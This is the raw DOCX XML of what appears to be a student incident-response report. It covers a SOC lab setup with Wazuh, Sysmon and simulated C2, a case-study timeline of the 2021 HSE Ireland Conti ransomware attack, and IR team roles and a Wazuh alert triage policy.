      <w:bookmarkEnd w:id="2"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F5C99"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>2.3  SOC Technology Stack</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="9"/>
        <w:tblW w:w="10298" w:type="dxa"/>
        <w:jc w:val="start"/>
        <w:tblInd w:w="0" w:type="dxa"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblCellMar>
          <w:top w:w="100" w:type="dxa"/>
          <w:start w:w="120" w:type="dxa"/>
          <w:bottom w:w="100" w:type="dxa"/>
          <w:end w:w="120" w:type="dxa"/>
        </w:tblCellMar>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1715"/>
        <w:gridCol w:w="1980"/>
        <w:gridCol w:w="2641"/>
        <w:gridCol w:w="3962"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="364" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1715"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Component</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="198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Tool / Version</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2641"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Purpose</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3962"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Coverage</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="509" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="171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SIEM</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="198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4.7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="264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Central log management, alerting, dashboards</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="396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DC01, FS01, WS-EMP01</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="697" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="171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Endpoint Logging</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="198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Sysmon v15 + SwiftOnSecurity config</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="264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Process, network, file, and registry telemetry</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="396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All Windows VMs</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="509" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="171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FIM</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="198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FIM (realtime)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="264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File Integrity Monitoring on C:\Shares</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="396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FS01 — all 4 department shares</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="509" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="171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C2 Simulation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="198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Sliver C2 / Metasploit MSF</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="264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Beacon generation and post-exploitation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="396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ATTACK01 → WS-EMP01</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="509" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="171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ATT Emulation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="198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Atomic Red Team (MITRE-mapped)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="264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Structured TTPs mapped to T1204.002, etc.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="396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WS-EMP01</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="325" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="171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Network</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="198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VMware Host-Only + Tailscale VPN</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="264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Isolated lab network + remote access simulation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="396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All assets</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="0" w:after="160"/>
        <w:jc w:val="start"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
        </w:pBdr>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="120"/>
        <w:ind w:hanging="0" w:start="0"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:bookmarkStart w:id="3" w:name="_Toc14391"/>
      <w:r>
        <w:rPr/>
        <w:t>Incident Overview — HSE Ireland 2021</w:t>
      </w:r>
      <w:bookmarkEnd w:id="3"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="0" w:after="160"/>
        <w:jc w:val="start"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>The Health Service Executive (HSE) attack represents the definitive case study in healthcare ransomware. Wizard Spider — a Russian-nexus financially motivated threat group — operated with patience and precision. Their 57-day dwell time demonstrates the danger of undetected initial access: by the time ransomware detonated, the attacker had Domain Administrator credentials, had mapped the entire environment, and had pre-positioned Conti payloads on servers spanning every HSE region.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="0" w:after="160"/>
        <w:jc w:val="start"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>The attack is particularly instructive because each phase presented a detection opportunity that went unrealized. The absence of EDR tooling, process-level logging, and tested incident response procedures — not technical impossibility — allowed Wizard Spider to operate freely for eight weeks.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="4" w:space="2" w:color="D6E4F0"/>
        </w:pBdr>
        <w:spacing w:before="240" w:after="80"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F5C99"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>3.1  Verified Attack Timeline (HSE 2021)</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="9"/>
        <w:tblW w:w="10519" w:type="dxa"/>
        <w:jc w:val="start"/>
        <w:tblInd w:w="0" w:type="dxa"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblCellMar>
          <w:top w:w="100" w:type="dxa"/>
          <w:start w:w="120" w:type="dxa"/>
          <w:bottom w:w="100" w:type="dxa"/>
          <w:end w:w="120" w:type="dxa"/>
        </w:tblCellMar>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1347"/>
        <w:gridCol w:w="5403"/>
        <w:gridCol w:w="3769"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="413" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1347"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Date</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5403"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Event</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3769"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rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:kern w:val="0"/>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="645" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="134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18 Mar 2021</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="540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Phishing email delivered to HSE employee. Malicious Excel document containing VBA macro opened — Cobalt Strike beacon executed via msiexec.exe</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="376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r>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="645" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="134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19–25 Mar 2021</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="540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Beacon establishes HTTPS C2 channel to attacker-controlled infrastructure. Persistence via scheduled tasks and registry run keys</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="376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r>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="645" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="134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March – April 2021</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="540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Active internal reconnaissance: AD enumeration (BloodHound), user account discovery, network share mapping</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="376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r>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="645" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="134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April 2021</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="540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Credential harvesting: LSASS dump via Mimikatz yields domain admin NTLM hashes. Kerberoasting against service accounts</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="376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r>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="645" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="134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April – May 2021</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="540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Lateral movement across HSE estate using Pass-the-Hash, RDP, and admin shares. Cobalt Strike deployed on 200+ servers including domain controllers</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="376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r>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="645" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="134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Early May 2021</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="540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Pre-positioning: Conti ransomware payload and batch deployment scripts staged on domain controllers and file servers</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="376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r>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="645" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="134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14 May 2021 00:00</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="540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Simultaneous Conti ransomware deployment across 80,000+ endpoints. All files encrypted; ransom note dropped. HSE IT systems go dark</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="376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r>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="506" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="134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Recovery</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="540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Decryption key eventually provided gratis. Full IT restoration: 6+ months. Remediation cost: €100M+</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="376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r>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="0" w:after="160"/>
        <w:jc w:val="start"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="9"/>
        <w:tblW w:w="9360" w:type="dxa"/>
        <w:jc w:val="start"/>
        <w:tblInd w:w="0" w:type="dxa"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblCellMar>
          <w:top w:w="120" w:type="dxa"/>
          <w:start w:w="160" w:type="dxa"/>
          <w:bottom w:w="120" w:type="dxa"/>
          <w:end w:w="160" w:type="dxa"/>
        </w:tblCellMar>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1400"/>
        <w:gridCol w:w="7960"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1400" w:type="dxa"/>
            <w:tcBorders/>
            <w:shd w:color="auto" w:fill="1B3A5C" w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:pageBreakBefore/>
              <w:widowControl/>
              <w:bidi w:val="0"/>
              <w:spacing w:before="0" w:after="0"/>
              <w:jc w:val="start"/>
              <w:rPr>
                <w:kern w:val="0"/>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:themeColor="accent1" w:themeTint="fd" w:val="DCE6F2"/>
                <w:kern w:val="0"/>
                <w:sz w:val="20"/>
                <w14:textFill>
                  <w14:solidFill>
                    <w14:schemeClr w14:val="accent1">
                      <w14:lumMod w14:val="20000"/>
                      <w14:lumOff w14:val="80000"/>
                    </w14:schemeClr>
                  </w14:solidFill>
                </w14:textFill>
              </w:rPr>
              <w:t>PHASE 1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7960" w:type="dxa"/>
            <w:tcBorders/>
            <w:shd w:color="auto" w:fill="1F5C99" w:val="clear"/>
            <w:tcMar>
              <w:start w:w="200" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Heading2"/>
              <w:widowControl/>
              <w:bidi w:val="0"/>
              <w:spacing w:before="240" w:after="80"/>
              <w:jc w:val="start"/>
              <w:rPr>
                <w:kern w:val="0"/>
              </w:rPr>
            </w:pPr>
            <w:bookmarkStart w:id="4" w:name="_Toc10633"/>
            <w:r>
              <w:rPr>
                <w:color w:themeColor="light1" w:val="FFFFFF"/>
                <w:kern w:val="0"/>
              </w:rPr>
              <w:t>PREPARATION</w:t>
            </w:r>
            <w:bookmarkEnd w:id="4"/>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="0" w:after="120"/>
        <w:jc w:val="start"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="9"/>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D4AC0D"/>
              <w:start w:val="single" w:sz="12" w:space="0" w:color="D4AC0D"/>
              <w:bottom w:val="single" w:sz="6" w:space="0" w:color="D4AC0D"/>
              <w:end w:val="single" w:sz="6" w:space="0" w:color="D4AC0D"/>
            </w:tcBorders>
            <w:shd w:color="auto" w:fill="FEF9E7" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:widowControl/>
              <w:spacing w:before="0" w:after="0"/>
              <w:jc w:val="start"/>
              <w:rPr>
                <w:kern w:val="0"/>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="D4AC0D"/>
                <w:kern w:val="0"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Phase Goal: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:color w:val="5D4037"/>
                <w:kern w:val="0"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Establish the people, processes, and technology required to detect and respond to a targeted ransomware intrusion before any attack occurs. Preparation quality is the single greatest predictor of incident response success.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="0" w:after="160"/>
        <w:jc w:val="start"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="4" w:space="2" w:color="D6E4F0"/>
        </w:pBdr>
        <w:spacing w:before="240" w:after="80"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F5C99"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>1.1  Roles &amp; Responsibilities</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="9"/>
        <w:tblW w:w="9360" w:type="dxa"/>
        <w:jc w:val="start"/>
        <w:tblInd w:w="0" w:type="dxa"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblCellMar>
          <w:top w:w="100" w:type="dxa"/>
          <w:start w:w="120" w:type="dxa"/>
          <w:bottom w:w="100" w:type="dxa"/>
          <w:end w:w="120" w:type="dxa"/>
        </w:tblCellMar>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1777"/>
        <w:gridCol w:w="873"/>
        <w:gridCol w:w="4233"/>
        <w:gridCol w:w="2477"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1777"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Role</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="873"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Tier</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4233"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Responsibility</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2477"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Assigned To</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="177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Team Leader</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="87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N/A</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="423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Authorises containment decisions, coordinates stakeholder communication, reviews final report</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="247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Salma Ali Mohamed </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="177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SOC Analyst</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="87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Tier 1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="423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Monitors Wazuh dashboard, triages incoming alerts, escalates confirmed incidents</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="247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lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cs="Calibri"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="1A1A1A"/>
                <w:kern w:val="0"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">Mohamed atef </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="177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Incident Responder</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="87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Tier 2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="423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Investigates confirmed incidents, collects forensic evidence, executes eradication tasks</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="247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lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="1A1A1A"/>
                <w:kern w:val="0"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Youssef </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="1A1A1A"/>
                <w:kern w:val="0"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>sharqawy</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="177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c>
          <w:tcPr>
            <w:tcW w:w="87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c>
          <w:tcPr>
            <w:tcW w:w="423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c>
          <w:tcPr>
            <w:tcW w:w="247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rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:kern w:val="0"/>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>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1.2  Alert Triage Policy</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="9"/>
        <w:tblW w:w="9360" w:type="dxa"/>
        <w:jc w:val="start"/>
        <w:tblInd w:w="0" w:type="dxa"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblCellMar>
          <w:top w:w="100" w:type="dxa"/>
          <w:start w:w="120" w:type="dxa"/>
          <w:bottom w:w="100" w:type="dxa"/>
          <w:end w:w="120" w:type="dxa"/>
        </w:tblCellMar>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1545"/>
        <w:gridCol w:w="1296"/>
        <w:gridCol w:w="4145"/>
        <w:gridCol w:w="2374"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1545"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Wazuh Alert Level</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1296"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Severity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4145"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Action Required</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="237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Response Time</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="154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Level 5–7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="129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Informational</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="414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Log and review during next shift. No immediate action.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="237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Next business day</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="154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Level 8–11</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="129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Low / Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="414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Analyst investigation during shift. Determine if escalation warranted.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="237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Within 4 hours</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="154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Level 12–14</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="129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414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Immediate Tier 1 investigation. Escalate to Tier 2 if confirmed.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="237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Within 30 minutes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="154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Level 15</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="129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CRITICAL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="414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Immediate containment action. Incident ticket opened. Team notified.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="237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Within 15 minutes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>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1.3  Pre-Attack Preparation Checklist</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="9"/>
        <w:tblW w:w="10116" w:type="dxa"/>
        <w:jc w:val="start"/>
        <w:tblInd w:w="0" w:type="dxa"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblCellMar>
          <w:top w:w="100" w:type="dxa"/>
